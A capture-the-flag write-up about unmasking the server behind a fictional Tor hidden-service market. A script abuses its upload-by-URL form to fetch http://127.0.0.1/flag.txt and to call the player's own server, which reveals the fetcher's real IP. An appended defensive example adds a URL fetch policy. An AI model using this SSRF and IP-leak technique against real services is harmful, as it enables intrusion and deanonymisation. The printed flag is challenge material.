A new black market has appeared and has been targeted by the FBI. After checking for suspicious posts on stackoverflow and finding nothing, they give up and are offering a bounty to anyone who can get information on the server that is hosting the hidden service. Link http://mq72g4732yorslzf.onion/
OK, the server is on a .onion domain! Let's go: set up the Tor client and connect to the hidden service, the Black Market! First, we look at the home page of this market, which contains some useful things :D.
There is a button at the top right of the home page; it points to an upload page, http://mq72g4732yorslzf.onion/upload.php
The user can either upload an image from their computer or specify a URL to the image.
OK, submit the form with this URL: http://3l1t3h4x0r.com/haxor.gif
After the form is submitted, we are redirected to the same page, upload.php, and the image is displayed at the bottom of the page.
OK, so where is the uploaded image stored? Take a look at the HTML source:
<img src="data:image/gif;base64,R0lGODlhpQ[...]MKAIRAAA7"/>
We can see at the end of the HTML source that the image isn't stored as a file but inlined as base64 data. OK, there is something here :). So I write a little script that submits a URL and reads back the base64 data:
""" Usage:
This script must be run in tor proxy to access onion target!
It take 1 argument, that is the url where will be uploaded image and print HTTP response
$ proxychains python upload-black-market.py "http://127.0.0.1/flag.txt"
"""
import sys, re, base64
import httplib, urllib
data = urllib.urlencode({"url": sys.argv[1], "upload": "Upload"})
h = httplib.HTTPConnection('mq72g4732yorslzf.onion:80')
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
h.request('POST', '/upload.php', data, headers)
r = h.getresponse()
b64 = re.search("(?<=base64,)(.*)\"", r.read()).group(1)
print b64
print base64.b64decode(b64)
After multiple attempts to find something interesting, another member of my team helped me:
- Hey, if you give a URL to your own server you can get the IP of the fetcher..
- Oh yeah! Why didn't I think of that earlier!!
So:
$ proxychains python upload-black-market.py "http://myserv.com/black-market"
And in my logs:
212.83.153.197 - - [05/Apr/2014:18:20:48 +0200] "GET /black-market HTTP/1.1" 403 439 "-" "-"
Thanks jpic!! :)
We can find the flag at http://212.83.153.197
He started screaming at me saying weird shit I didn't understand, then he just looked blank and mumbled: "The flag .. The flag.. It is '0hSh1t1r4n0ut0fn00dl35'." And then he just died in front of me.
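To show the defensive side of what this write-up exploits, here is an added example of my own; it is not part of the original write-up or of the challenge. It models the server-side policy an upload-by-URL feature should apply: only http/https schemes, no credentials in the URL, and no host that resolves to a loopback, private, link-local or otherwise non-public address (which is what stops a probe like the http://127.0.0.1/flag.txt one above). It also builds and parses the inline base64 <img> the page renders, and refuses to embed anything that is not an image. The hostnames, the DNS table and the sample GIF bytes are constructed for the demo.

```python
"""Added example: fetch policy and data-URI handling for an upload-by-URL
feature.  Everything here is constructed for illustration; the DNS table
stands in for the real resolver so the demo runs offline."""
import base64
import ipaddress
import re
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed DNS table for the offline demo; the real handler passes
# socket.gethostbyname (the default) as the resolver.
DEMO_DNS = {"example.com": "93.184.216.34", "intranet.local": "10.0.0.5"}


def demo_resolve(host: str) -> str:
    """Resolver stub: IP literals resolve to themselves, names via DEMO_DNS."""
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    if host in DEMO_DNS:
        return DEMO_DNS[host]
    raise socket.gaierror(f"cannot resolve {host}")


def is_public_address(ip: str) -> bool:
    """True only for globally routable unicast addresses: loopback, RFC 1918,
    link-local, CGNAT, documentation, reserved and multicast are all rejected."""
    addr = ipaddress.ip_address(ip)
    return addr.is_global and not addr.is_multicast


def check_fetch_url(url: str, resolve=socket.gethostbyname):
    """Return (True, resolved_ip) if the fetcher may contact this URL,
    otherwise (False, reason).  `resolve` is injectable for offline tests."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if not parts.hostname:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in URL"
    host = parts.hostname
    try:
        ip = resolve(host)
        if not is_public_address(ip):
            return False, f"{host} resolves to non-public address {ip}"
    except (socket.gaierror, OSError):
        return False, f"unresolvable host {host}"
    except ValueError:
        return False, f"resolver returned a non-address for {host}"
    return True, ip


# Matches the inline image the upload page renders: <img src="data:<mime>;base64,<payload>"/>
DATA_URI_RE = re.compile(
    r'src="data:(?P<mime>[\w.+-]+/[\w.+-]+);base64,(?P<b64>[A-Za-z0-9+/=]+)"'
)


def render_inline_image(mime: str, blob: bytes) -> str:
    """Embed fetched bytes as a data URI instead of writing a file.  Only image
    types are embedded, so a fetched text file never ends up in the page."""
    if not mime.startswith("image/"):
        raise ValueError(f"refusing to embed {mime}")
    return f'<img src="data:{mime};base64,{base64.b64encode(blob).decode()}"/>'


def extract_data_uri(html: str):
    """Pull (mime, bytes) out of the first inline base64 <img>, or None."""
    m = DATA_URI_RE.search(html)
    if not m:
        return None
    return m.group("mime"), base64.b64decode(m.group("b64"), validate=True)


if __name__ == "__main__":
    for url in ("http://example.com/haxor.gif", "http://127.0.0.1/flag.txt",
                "http://intranet.local/", "ftp://example.com/haxor.gif"):
        print(f"{url:35} -> {check_fetch_url(url, resolve=demo_resolve)}")
    page = render_inline_image("image/gif", b"GIF89a\x01\x00\x01\x00")  # constructed GIF header
    print(page)
    print(extract_data_uri(page))
```

Two caveats a practitioner would add. First, the address check happens at resolve time, so a host whose DNS answer changes between the check and the connect (DNS rebinding) can slip past; pin the connection to the IP that was checked, or re-check the peer address at connect time. Second, none of this addresses the leak the write-up actually used: the fetcher's source IP in the target's access log. The fix for that is architectural, not a URL filter: a hidden service must never make outbound requests from its real network address, so route every fetch through the local Tor SOCKS port (9050 by default, an assumption about the operator's setup) or hand the fetch off to a separate, disposable host that is not linked to the service.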